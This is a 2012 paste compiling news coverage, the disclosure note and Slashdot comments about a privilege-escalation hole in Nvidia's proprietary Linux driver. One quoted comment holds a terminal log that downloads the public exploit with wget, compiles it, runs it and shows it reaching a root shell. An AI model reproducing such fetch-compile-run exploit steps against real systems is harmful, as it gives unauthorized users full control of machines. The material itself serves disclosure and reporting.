pastebin - collaborative debugging tool
kpaste.net RSS


Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole
Posted by Anonymous on Wed 1st Aug 2012 23:55
raw | new post

  1. Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole
  2.  
  3. Posted by Unknown Lamer on Wednesday August 01, @01:31PM
  4.  
  5. http://linux.slashdot.org/story/12/08/01/1618225/proprietary-nvidia-linux-driver-contains-privilege-escalation-hole
  6.  
  7. "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public."[1] The one releasing the exploit (relayed to him anonymously) is David Arlie[2], well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.
  8.  
  9. [1] http://permalink.gmane.org/gmane.comp.security.full-disclosure/86747
  10. [2] http://airlied.livejournal.com/
  11.  
  12. ############################################
  13.  
  14. "With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it." - http://linux.slashdot.org/comments.pl?sid=3019869&cid=40845025
  15.  
  16. ############################################
  17.  
  18. "Nvidia are just serial fuckups. Wasted half my saturday trying to find a driver release that would work on my wifes Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.
  19.  
  20. Nvidia, still haven't forgotten all the accelerated functions in your chipsets that gradually got turned of as drivers updated, because the hardware was rotten to the core and couldn't be made to work. Or the ongoing multi year saga of begging for working PAL TV support, all of it falling on deaf ears. Or the magically vanished TV out support when Vista shipped.
  21.  
  22. Frankly a root exploit is one of their lesser sins."
  23. - http://linux.slashdot.org/comments.pl?sid=3019869&cid=40845215
  24.  
  25. ############################################
  26.  
  27. It's certainly legit..
  28.  
  29. c@v:~$
  30. c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
  31. 2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
  32. c@v:~$ mv 86747-001.bin nvid-root.c
  33. c@v:~$ gcc nvid-root.c -o nvid-root
  34. c@v:~$ ./nvid-root
  35. [*] IDT offset at 0xc1808000
  36. [*] Abusing nVidia...
  37. [*] CVE-2012-YYYY
  38. [*] 32-bits Kernel found at ofs 0
  39. [*] Using IDT entry: 220 (0xc18086e0)
  40. [*] Enhancing gate entry...
  41. [*] Triggering payload...
  42. [*] Hiding evidence...
  43. [*] Have root, will travel..
  44. sh-4.2#
  45. sh-4.2#
  46.  
  47. sh-4.2# id
  48. uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
  49. sh-4.2#
  50.  
  51. sh-4.2# lsb_release -a
  52. LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
  53. Distributor ID: Ubuntu
  54. Description: Ubuntu 12.04 LTS
  55. Release: 12.04
  56. Codename: precise
  57.  
  58. sh-4.2# uname -a
  59. Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
  60. sh-4.2#
  61.  
  62. - http://linux.slashdot.org/comments.pl?sid=3019869&cid=40845239
  63.  
  64. ############################################
  65.  
  66. The graphics driver is both monstrously large and operates at a very low level, there are going to be tons and tons of security problems with it when people start seriously looking at it. As John Carmak put it: I agree with Microsoft’s assessment that WebGL is a severe security risk. The gfx driver culture is not the culture of security.
  67. - http://linux.slashdot.org/comments.pl?sid=3019869&cid=40845991
  68.  
  69. ############################################
  70.  
  71. Linus Torvalds To Nvidia - "Fuck You"
  72. https://www.youtube.com/watch?v=_36yNWw_07g
  73.  
  74. In a talk held at Aalto University in Helsinki Finland, Linus Torvalds addressed a question from one of the audience members regarding issues they had with a laptop running NVIDIA Optimus graphics and the lack of support for Linux.
  75.  
  76. ############################################
  77.  
  78. Privilege escalation security hole found in Nvidia Linux driver
  79.  
  80. Summary: A new security hole has been discovered in Nvidia's Linux driver. Nvidia has allegedly known about the vulnerability for more than a month but has yet to fix it.
  81.  
  82. By Emil Protalinski for Zero Day | August 1, 2012
  83.  
  84. http://www.zdnet.com/privilege-escalation-security-hole-found-in-nvidia-linux-driver-7000001986/
  85.  
  86. An anonymous hacker has found a security hole in the Nvidia binary. He or she allegedly reported it to Nvidia "over a month ago" and did not receive a reply, nor was the flaw ever patched. The exploit has now been made public.
  87.  
  88. Software Engineer Dave Airlie was sent details of the vulnerability. After testing it out and discovering that it indeed works, he posted the exploit for everyone to see over at the mailing list full-disclosure@lists.grok.org.uk.
  89.  
  90. The flaw essentially allows an attacker to write to any part of memory on the system by shifting the VGA window after attaining superuser privileges. For reference, here's the full text of Airlie's disclosure:
  91.  
  92.     First up I didn't write this but I have executed it and it did work here,
  93.  
  94.     I was given this anonymously, it has been sent to nvidia over a month ago with no reply or advisory and the original author wishes to remain anonymous but would like to have the exploit published at this time, so I said I'd post it for them.
  95.  
  96.     It basically abuses the fact that the /dev/nvidia0 device accept changes to the VGA window and moves the window around until it can read/write to somewhere useful in physical RAM, then it just does an priv escalation by writing directly to kernel memory.
  97.  
  98.     Dave.
  99.  
  100. I have contacted Nvidia about this security hole. I have also contacted Airlie for any more information he may be willing to provide. I will update you if and when I hear back.
  101.  
  102. http://airlied.livejournal.com/
  103. http://permalink.gmane.org/gmane.comp.security.full-disclosure/86747
  104.  
  105. ############################################
  106.  
  107. eof

Submit a correction or amendment below (click here to make a fresh posting)
After submitting an amendment, you'll be able to view the differences between the old and new posts easily.

Syntax highlighting:

To highlight particular lines, prefix each line with {%HIGHLIGHT}




All content is user-submitted.
The administrators of this site (kpaste.net) are not responsible for their content.
Abuse reports should be emailed to us at